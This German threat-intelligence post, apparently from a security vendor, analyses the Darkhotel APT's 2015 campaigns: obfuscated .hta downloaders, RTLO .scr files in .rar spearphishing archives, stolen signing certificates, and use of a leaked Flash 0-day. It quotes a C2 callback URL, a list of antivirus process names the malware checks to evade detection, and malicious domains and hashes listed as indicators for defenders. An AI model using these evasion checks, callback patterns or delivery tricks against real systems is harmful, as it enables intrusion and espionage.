Attacken der Darkhotel APT im Jahr 2015

Die Attacken der Darkhotel APT aus dem Jahr 2014 und früher zeichnen sich durch den Missbrauch gestohlener Zertifikate aus, durch die Bereitstellung von .hta-Dateien mit vielfältigen Techniken und den Einsatz ungewöhnlicher Methoden, wie die Unterwanderung von Wi-Fi in Hotels zur Platzierung von Backdoors im Zielsystem. Im Jahr 2015 sind viele dieser Techniken und Aktivitäten noch immer in Gebrauch und aktuell. Doch neben neuen Varianten von schädlichen .hta gibt es auch neue Opfer, .rar-Anhänge mit RTLO-Spearphishing und die Bereitstellung eines 0-Day-Exploits von Hacking Team.

Die Darkhotel APT greift nach wie vor Ziele mittels Spearphishing rund um den Globus an, wobei die geografische Reichweite nun größer ist als in früheren Botnetzen und Angriffen auf Wi-Fi in Hotels. Einige der Ziele sind diplomatische Einrichtungen oder haben strategische kommerzielle Interessen.

Standorte der Darkhotel-Ziele und Opfer im Jahr 2015:

  • Nordkorea
  • Russland
  • Südkorea
  • Japan
  • Bangladesch
  • Thailand
  • Indien
  • Mozambique
  • Deutschland

2015 Darkhotel .hta-Websites sowie mit Backdoors und Exploits in Zusammenhang stehende Sites sowie C2-Websites:

  • storyonboard[.]net
  • tisone360[.]org
  • openofficev[.]info
  • saytargetworld[.]net
  • error-page[.]net
  • eonlineworld[.]net
  • enewsbank[.]net
  • thewordusrapid[.]com

Attachment-Namen in Spearphishing-Mails im Jahr 2015:

  • schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
  • schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
  • congratulation.rar -> congratulation_?gpj.scr
  • letter.rar -> letter_?gpj.scr

Beständiger Einsatz obfuskierter .hta-Downloader

Ob eine Infektion nun durch Spearphishing, physischen Zugriff auf das System oder das Flash-0-Day-Explpoit von Hacking Team erfolgt ist, es scheint immer wieder dieselbe allgemein übliche Methode zu geben, wie ein frisch infiziertes System mit dem Command und Control-Server der APT-Gruppe Darkhotel kommuniziert:

Ein innerhalb einer .hta-Datei verwahrtes, hochgradig obfuskiertes (doppelt escaptes Set von Javascript Variablenwerten) Skript schreibt eine ausführbare Datei auf die Festplatte und führt sie aus.

Es ist interessant, dass diese spezielle Gruppe nun schon seit Jahren Backdoor- und Downloader-Code in Form von .hta-Dateien bereitstellt. Im Jahr 2010 konnten wir beobachten, wie Artikel über Nordkorea von der US-Denkfabrik Brookings Institute umfunktioniert wurden, um mit Nordkorea in Verbindung stehende Ziele mit Schadcode anzugreifen, der in .hta-Dateien verborgen war. Die Gruppe verschickte auch per E-Mail Links auf ihre schädlichen .hta-Dateien an nordkoreanische Touristengruppen, an Unternehmer mit Interesse an Nordkorea und so weiter. Die starke Abhängigkeit von älteren Windows-spezifischen Technologien wie HTML-Applikationen, die Microsoft im Jahr 1999 eingeführt hat, erscheint hier recht merkwürdig.

Von dem jüngsten sendspace.servermsys.com/downloader.hta:

Nach der Ausführung und dem Escapen einer Reihe von Variablen verwendet die .hta uralte Adodb.stream-Komponenten, um einen String mit dem Wert 0x3d für die XOR-Maske als eine ausführbare Datei herauszuschreiben und sie zu starten.

Dieser Code führt zu der Ausführung von “internet_explorer_Smart_recovery.exe” 054471f7e168e016c565412227acfe7f, und einem verborgenen Browserfenster, das den C2 zurückruft. In diesem Fall scheinen die Darkhotel-Betreiber zu prüfen, ob der Standardbrowser ihrer Opfer der Internet Explorer ist oder nicht, da alle IE-Versionen den Wert “0” zurückgeben und andere Browser “appMinorVersion” undefiniert lassen. Diese Datensammlung erscheint etwas merkwürdig, da die .hta-Dateien nur auf Windowssystemen von dem Prozess mshta.exe unterstützt und ausgeführt werden, der noch in Windows 8 vorhanden ist. Vermutlich ist das ein Artefakt aus der frühen Entwicklungsphase des Codes. Hier ist eine neue Version:

“hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=“ + navigator.appMinorVersion + ”

Die Datei “internet_explorer_Smart_recovery.exe” ist ein einfacher obfuskierter Downloader. Eine Reihe von XOR 0x28-Loops entschlüsselt die Inhalte einer selbst löschenden Batch-Datei, die dann auf die Festplatte geschrieben und ausgeführt wird. Später während der Ausführung entschlüsselt ein komplexerer RC4-Loop die Download-URL und andere Strings und Importe.

Ist das beendet, sieht die URL der String-Entschlüsselung und die Rückverbindung folgendermaßen aus: http://sendspace.servermsys.com/wnctprx. Die Datei wird (b1f56a54309147b07dda54623fecbb89) als “.tmp”-Datei in das Verzeichnis %temp% heruntergeladen, ausgeführt und der Downloader wird beendet. Diese größere Datei ist eine Backdoor/ein Downloader, der über SSH-Funktionalität verfügt und seine Schlüssel für SSH-Interaktion auf der Festplatte ablegt. Wir finden auch ältere Info-Stealer von Darkhotel, die von diesen Downloadern auf das System transportiert und dort ausgeführt werden.

Spearphishing und .RAR-Anhänge mit RTLO

Die Darkhotel-APT bombardiert bestimmte Ziele schonungslos mit Spearphishing-Attacken, um die Systeme erfolgreich zu kompromittieren. Einige der Ziele werden wiederholt mit den immer gleichen Social-Engineering-Schemata angegriffen. So wurde das Attachment mit der Bezeichnung “schedule(2.11~16).rar” beispielsweise am 10. Februar von der Darkhotel-Gruppe an ein Ziel geschickt, das Ende Mai in einem zweiten Versuch abermals von dem Anhang “schedule(6.1~6).rar” heimgesucht wurde.

Es werden regelmäßig ausführbare RTLO .scr-Dateien innerhalb von .rar-Archiven verwahrt, damit diese in den Augen der Opfer als harmlose.jpg-Dateien erscheinen. Bei diesen ausführbaren Dateien handelt es sich um leichte Dropper, die diese Köder-jpeg-Dateien verwahren, und um Code zur Erstellung eines lnk-Downloaders.

Wenn das Ziel versucht, das zu öffnen, was es für eine jpg-Bilddatei hält, führt der ausführbare Code eine jpg-Datei aus und platziert sie auf der Festplatte, dann öffnet er sie mit mspaint.exe im Hintergrund. Dieses Dokument mit dem Titel “congratulations” ist auf Koreanisch verfasst und hat ein vermutetes Merkmal des beabsichtigten Ziels zum Inhalt.

Während das Bild angezeigt wird, transportiert der Code einen ungewöhnlichen mspaint.lnk-Shortcut auf die Festplatte und startet ihn. Der Shortcut unterstützt ein mehrzeiliges Ziel-Shell-Script. Diese Technik wird auch von anderen APTs als Nachhaltigkeitsmechanismus eingesetzt, wie unsere Kollegen bei Mandiant dokumentiert haben. Bei der Ink-Datei von 64 KB handelt es sich um Downloader-Code:

Wenn diese lnk-Datei ausgeführt wird, startet sie einen AJAX-basierten Download-Prozess für die “unzip.js“-Datei (a07124b65a76ee7d721d746fd8047066) auf openofficev.info. Das ist eine weitere wscript-Datei, die AJAX für den Download und die Ausführung einer relativ groß kompilierten ausführbaren Datei implementiert:

Dieser ausführbare Code wird unter %temp%csrtsrm.exe gespeichert und dort ausgeführt. Es handelt sich um eine relativ große ausführbare Datei (~1.2 MB), die Schadcode einschleust und entfernt Bedrohungen in legitimen Prozessen verbreitet.

Gestohlene Zertifikate und Umgehung

Die Gruppe scheint einen Vorrat an gestohlenen Zertifikaten zu horten, mit denen sie ihre Downloader und die Backdoors signiert. Einige der kürzlich für ungültig erklärten Zertifikate gehören dem Unternehmen Xuchang Hongguang Technology Co. Ltd.

Darkhotel bemüht sich nun, seinen Code unter mehreren Verschlüsselungs-Schichten zu verbergen. Wahrscheinlich richtet sich die Gruppe langsam darauf ein, besser geschützte Umgebungen anzugreifen und möchte diese gestohlenen Zertifikate nicht leichtfertig verbrennen. In früheren Attacken hätten sich die Angreifer einfach eine lange Liste schwach implementierter, defekter Zertifikate zunutze gemacht.

Nicht nur ihre Obfuskationstechniken werden besser und stärker, sondern auch die Liste ihrer Anti-Detektionstechnologien wird immer länger. Dieser signierte Downloader (d896ebfc819741e0a97c651de1d15fec) beispielsweise entschlüsselt schrittweise eine Reihe von Anti-Malware-Strings, um neue Abwehrtechnologien auf frisch infizierten Systemen zu identifizieren und öffnet dann jeden Prozess, um nach Übereinstimmungen mit den folgenden Dateinamen von AV-Anbietern zu suchen:

c:avast! sandboxWINDOWSsystem32kernel32.dll – Avast!
avp.exe – Kaspersky Lab
mcagent.exe;mcuicnt.exe – Intel/Mcafee
bdagent.exe – BitDefender
ravmon.exe,ravmond.exe – Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe – Qihoo 360
ayagent.aye,avguard.;avgntsd.exe – Avira Antivirus
ccsvchst.exe,nis.exe – Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe – Avast!
msseces.exe;msmpeng.exe – Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe – G-Data
avas.exe – TrustPort AV
tptray.exe – Toshiba utility
fsma32.exe;fsorsp.exe – F-Secure
econser.exe;escanmon.exe – Microworld Technologies eScan
SrvLoad.exe;PSHost.exe – Panda Software
egui.exe;ekrn.exe – ESET Smart Security
pctsSvc.exe;pctsGui.exe – PC Tools Spyware Doctor
casc.exe;UmxEngine.exe – CA Security Center
cmdagent.exe;cfp.exe – Comodo
KVSrvXP.exe;KVMonXP.exe – Jiangmin Antivirus
nsesvc.exe;CClaw.exe – Norman
V3Svc.exe – Ahnlab
guardxup. – IKARUS
FProtTray. – F-Prot
op_mon – Agnitum Outpost
vba332ldr.;dwengine. – DrWeb

Selbst die ID-Informationen, die die Backdoor auf einem System sucht, werden bis zur Laufzeit nicht entschlüsselt. Wie die Komponente “Information-Stealer” in unserem letzten technischen Bericht zu Darkhotel belegte, versucht diese Komponente einen Datensatz zu stehlen, mit dem das infizierte System identifiziert wird. Viele der Informationen werden zusammen mit demselben Aufrufsatz gesammelt, d.h. kernel32.GetDefaultSystemLangID, kernel32.GetVersion und kernel32.GetSystemInfo:

  • Voreingestellte System-Codepage
  • Netzwerkadapter-Informationen
  • Prozessor-Architektur
  • Hostname und IP-Adresse
  • Windows Betriebssystem und Service Pack Versionen

Grundsätzlich ist ein großer Teil dieses „Information-Stealer“-Codes mit dem aus vorherigen Attacken identisch.

Tisone360.com, Visits und das Flash 0-Day-Exploit von Hacking Team

Die Website tisone360.com war besonders interessant für uns. Im April 2015 verschickte die Darkhotel-Gruppe Phishing-Mails mit Links auf frühere (cve-2014) Flash-Exploits, und dann, Anfang Juli, fing sie an das zu verbreiten, was laut Berichten ein durchgesickertes Flash-0-Day-Exploit von Hacking Team ist.

Es scheint, als habe die Darkhotel APT das durchgesickerte Hacking Team Flash-0-Day-Exploit benutzt, um bestimmte Systeme anzugreifen. Wir können abgeleitet von “tisone360.com” etwas von dieser Aktivität identifizieren. Die Site war erst ab dem 22. Juli 2015 fertig und aktiv. Allerdings scheint sich ihre Aktivität keineswegs darauf zu beschränken. Neben dem icon.swf HT 0-Day-Exploit (214709aa7c5e4e8b60759a175737bb2b) scheint die Site “tisone360.com” auch ein Flash CVE-2014-0497 Exploit im April in Umlauf gebracht zu haben. Wir haben Adobe über die entsprechende Sicherheitslücke im Januar 2014 informiert, als sie von der Darkhotel-APT ausgenutzt wurde.

Kürzlich hat die Darkhotel-APT mehrere funktionierende Verzeichnisse auf dieser Site abgelegt.

Das aktivste dieser Verzeichnisse ist ims2. Es enthält eine Sammlung von Backdoors und Exploits. Am interessantesten ist dabei das Hacking Team Flash 0-Day-Exploit, icon.swf. In den Tagen nach der öffentlichen Erwähnung dieses Servers schränkte das Team den offenen Zugriff auf /ims2/ langsam ein. Auf die eine oder andere Art wurden die Inhalte aber weiterhin aktiv genutzt.

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
-> %temp%RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Nachdem die Datei icon.jpg vom Flash-Exploit heruntergeladen wurde, wird es von einem Multi-Byte-XOR-Schlüssel 0xb369195a02 decodiert. Danach lädt sie weitere Komponenten.

Interessant ist, dass die Gruppe anscheinend die Kompilations- und Linker-Zeitstempel ihres ausführbaren Codes auf Daten im Jahr 2013 verschoben hat. Wir können das bei vielen Samples feststellen, die Mitte 2015 bereit gestellt und erstmals beobachtet wurden, den Downloader icon.jpg eingeschlossen.

Ein Log der Besuche des Site-Verzeichnisses bestätigt, dass das Verzeichnis am 8. Juli erstellt wurde. Eine Handvoll Besuche einer speziellen URL auf dem Server von fünf Systemen in den folgenden Ländern wurden am 8. und 9. aufgezeichnet. Bei mehreren davon handelt es sich vermutlich um Ziele der Darkhotel APT:

  • Deutschland
  • Südkorea
  • China (vermutlich untersucht)
  • US
  • Japan

Doch eins dieser Systeme überfrachete die Site am 9. Juli mit fast 12.000 Besuchen innerhalb von 30 Minuten. Dieses Traffic-Volumen scheint eher von einem lautstarken Versuch, die Site zu scannen und zu untersuchen herzurühren, als von einem DoS-Angriff:

Dokumentierte Besuche der Sites nach dem 9. Juli sind eher unsicher und könnten von weiteren Forschern stammen, als Reaktion auf den zunehmend schlechten Ruf der Site infolge der öffentlichen Berichte über den 9. Juli. Viele dieser etwa 50 Besuche stammen von einer Untergruppe der oben aufgeführten Systeme und wurden viele Male wiederholt. Weitere Besuche nach dem 10. Juli gab es von den folgenden Standorten:

  • Deutschland (vermutlich untersucht)
  • Ukraine (vermutlich untersucht)
  • Amazon Web Services, mehrere Standorte (vermutlich untersucht)
  • Googlebot, mehrere Standorte
  • USA
  • Irland (vermutlich untersucht)
  • Russland
  • Brasilien
  • China
  • Finnland
  • Kanada
  • Taiwan
  • Frankreich (vermutlich untersucht)
  • Tschechische Republik

Ein beständiger Angriffsstrom

Die Darkhotel-Gruppe hält sich an das, was funktioniert. Beispielsweise beobachteten wir jahrelang den wiederholten Einsatz von Spearphishing-Attacken, die direkt .hta-Dateien transportieren. Wie im Fall der oben beschriebenen Site tisone360.com konnten wir im Jahr 2015 wiederholt den Einsatz von kreativen Lieferketten beobachten.

Downloader -> Ansiedlung der hta-Datei -> Info Stealer -> weitere kompilierte Komponenten.
Dropper -> wsh-Skript -> wsh-Skript -> Info Stealer -> weitere kompilierte Komponenten
Spearphishing -> Dropper -> Ansiedlung der hta-Datei -> Downloader -> Info Stealer

Während die Lieferkette, die obfuskierte Skripte innerhalb von .hta-Dateien beinhaltet, bereits im Jahr 2011 erstmals eingesetzt wurde, scheint der Umfang im Jahr 2014 ebenso wie jetzt, im Jahr 2015, zugenommen zu haben.

openofficev[.]info (2015)
office-revision[.]com (2014)
online.newssupply[.]net (2011)

Verbergen der Infrastruktur

Die Gruppe achtet nun sorgfältiger darauf, ihre Sites zu bewahren und strafft den Konfigurations- und Antwort-Content. Derzeit antwortet ein C2 der Gruppe mit Bildern von “Drinky Crow” aus dem Maakies Cartoon:

Andere C2s von Darkhotel fügen sich in willkürliche Sites im Web ein, wenn inkorrekte oder fehlende Seiten besucht werden. Sie zerlegen entweder Bilder von FOTOLIA oder Artikel über Eiscremeherstellung hier:

Technische Details

HTA MD5:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

MD5 der Spearphishing-Anhänge:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (erstmals beobachtet 2014, benutzt bis 2015)
e85e0365b6f77cc2e9862f987b152a89 (erstmals beobachtet Ende 2014, benutzt bis 2015)

MD5 großer Downloader 2015:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Infostealer aus dem Jahr 2015

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Subhosts und URLs:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2
www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

Parallele und frühere Untersuchungen:

CVE-2014-0497 – Eine 0-Day-Sicherheitslücke

Hacking Team Flash Zero-Day Tied To Attacks In Korea and Japan… on July 1

Die Darkhotel APT

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.